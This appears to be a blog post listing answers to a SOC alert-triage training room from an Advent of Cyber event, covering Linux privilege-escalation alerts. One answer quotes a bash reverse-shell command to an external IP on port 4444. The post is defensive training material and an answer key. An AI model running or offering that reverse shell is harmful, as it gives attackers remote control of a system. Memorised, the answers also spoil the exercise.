Day 10 of Advent of Cyber, SOC Alert Triaging — Tinsel Triage.
Hello everyone, its day 10 of AoC!!!!
Day 10 of Advent of Cyber, SOC Alert Triaging — Tinsel Triage.
Hello everyone, its day 10 of AoC!!!!

Q1)How many entities are affected by the Linux PrivEsc — Polkit Exploit Attempt alert?
10
Q2)What is the severity of the Linux PrivEsc — Sudo Shadow Access alert?
High
Q3)How many accounts were added to the sudoers group in the Linux PrivEsc — User Added to Sudo Group alert?
4
Q4)What is the name of the kernel module installed in websrv-01?
malicious_mod.ko
Q5)What is the unusual command executed within websrv-01 by the ops user?
/bin/bash -i >& /dev/tcp/198.51.100.22/4444 0>&1
Q6)What is the source IP address of the first successful SSH login to storage-01?
172.16.0.12
Q7)What is the external source IP that successfully logged in as root to app-01?
203.0.113.45
Q8)Aside from the backup user, what is the name of the user added to the sudoers group inside app-01?
deploy
“If this helped you, feel free to give it a clap!”
메타데이터
- post_id
- 7e7f1f87331c
- slug
- day-10-of-advent-of-cyber-soc-alert-triaging-tinsel-triage-7e7f1f87331c
- url
- https://medium.com/@pandasuhani3/day-10-of-advent-of-cyber-soc-alert-triaging-tinsel-triage-7e7f1f87331c
- canonical_url
- https://medium.com/@pandasuhani3/day-10-of-advent-of-cyber-soc-alert-triaging-tinsel-triage-7e7f1f87331c
- author_url
- https://medium.com/@pandasuhani3
- status
- ok
- fetched_at
- 2026-08-20 14:41:41